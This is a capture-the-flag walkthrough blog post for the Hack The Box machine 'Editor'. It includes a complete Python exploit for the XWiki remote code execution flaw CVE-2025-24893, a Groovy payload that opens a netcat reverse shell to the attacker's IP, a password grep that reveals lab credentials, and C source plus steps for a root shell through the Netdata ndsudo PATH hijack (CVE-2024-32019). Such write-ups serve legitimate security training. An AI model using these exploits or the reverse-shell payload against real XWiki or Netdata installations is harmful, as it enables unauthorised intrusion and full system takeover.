Hackthebox: Editor

Foued SAIDI Lv5
  2025-12-06 21:42:39 2025-12-06 21:42:39 Created   2025-12-06 22:08 2025-12-06 22:08 Updated    

Overview

Editor is an easy-difficulty machine from Hack The Box dealing initially with CVE-2025-24893 which is an RCE on XWiki Platform leading us later to exfiltrate user credentials and eventually exploit CVE-2024-32019 which is a local privilege escalation using ndsudo.

Editor-info-card
Editor-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-webdav-scan:
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_  Server Type: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see we have our usual ssh and http (80) ports open with http redirecting us to editor.htb which we will add to /etc/hosts. Alongside a web application deployed on port 8080.

Web Application - http://editor.htb:8080

Looking around we can find a wiki on editor.htb: wiki.editor.htb

XWiki - Main - Intro

Doing some googling we discover CVE-2025-24893-EXP which is a remote code execution on XWiki.

We can start testing with a basic whoami command:

1
2
3
kujen@DESKTOP-MFRH5U5:~/HackTheBox/Machines/Editor/CVE-2025-24893-EXP$ python3 CVE-2025-24893-EXP.py  -u http://wiki.editor.htb/xwiki -c whoami
[+] Command Output:
xwiki

BUT change PoC code to this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import argparse
import requests
import re
from urllib.parse import urljoin, quote
import html

BANNER = """
===========================================================
                   CVE-2025-24893
            XWiki Remote Code Execution Exploit
                      Author: Artemir
===========================================================
"""

def extract_output(xml_text):
    decoded = html.unescape(xml_text)
    match = re.search(r"\[}}}(.*?)\]", decoded)
    if match:
        return match.group(1).strip()
    else:
        return None

def exploit(url, cmd):
    headers = {
        "User-Agent": "Mozilla/5.0",
    }

    payload = (
        "}}}{{async async=false}}{{groovy}}"
        f"println('{cmd}'.execute().text)"
        "{{/groovy}}{{/async}}"
    )

    encoded_payload = quote(payload)
    exploit_path = f"/xwiki/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"
    full_url = urljoin(url, exploit_path)

    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            output = extract_output(response.text)
            if output:
                print("[+] Command Output:")
                print(output)
            else:
                print("[!] Exploit sent, but output could not be extracted.")
                print("[*] Raw response (truncated):")
                print(response.text[:500])
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-24893 - XWiki RCE PoC")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g. http://example.com)")
    parser.add_argument("-c", "--cmd", required=True, help="Command to execute")

    args = parser.parse_args()
    exploit(args.url, args.cmd)

Now go to http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch , put this payload:

1
}}}{{async async=false}}{{groovy}}println("busybox nc 10.10.16.14 9001 -e /bin/sh".execute().text){{/groovy}}{{/async}}

then click the link below it to trigger it.

After getting a shell, do ‘grep -iR password’ and we will get oliver credentials: oliver:theEd1t0rTeam99 and the user flag:

1
2
3
oliver@editor:~$ cat user.txt
388dbae40f5d2e047b2d91391c5392ce
oliver@editor:~$

Privilege Escalation - CVE-2024-32019

We can see oliver is a memver of netdata group:

1
2
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

We can confirm this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
oliver@editor:~$ find / -perm -u=s -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Doing some googling we can find CVE-2024-32019 which is CVE-2024-32019 which works by injecting a malicious binary into the user’s PATH that impersonates a trusted command (nvme) and is executed with root privileges by ndsudo.

steps:
1- compile this code on your own machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("Got root!\n");

    // Drop into a root shell
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);

    // If execl fails
    perror("execl");
    return 1;
}

Run:
gcc nvme.c -o nvme

  1. take it to the mchine with wget
  2. copy it to /tmp
  3. run export PATH=/tmp:$PATH
  4. chmod +x /tmp/nvme
  5. /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

And get a root shell!

That was it for Editor, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Editor
  • Author: Foued SAIDI
  • Created at : 2025-12-06 21:42:39
  • Updated at : 2025-12-06 22:08:00
  • Link: https://kujen5.github.io/2025/12/06/Hackthebox-Editor/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Editor
  1. Overview
  2. Reconnaissance
  3. Web Application - http://editor.htb:8080
  4. Privilege Escalation - CVE-2024-32019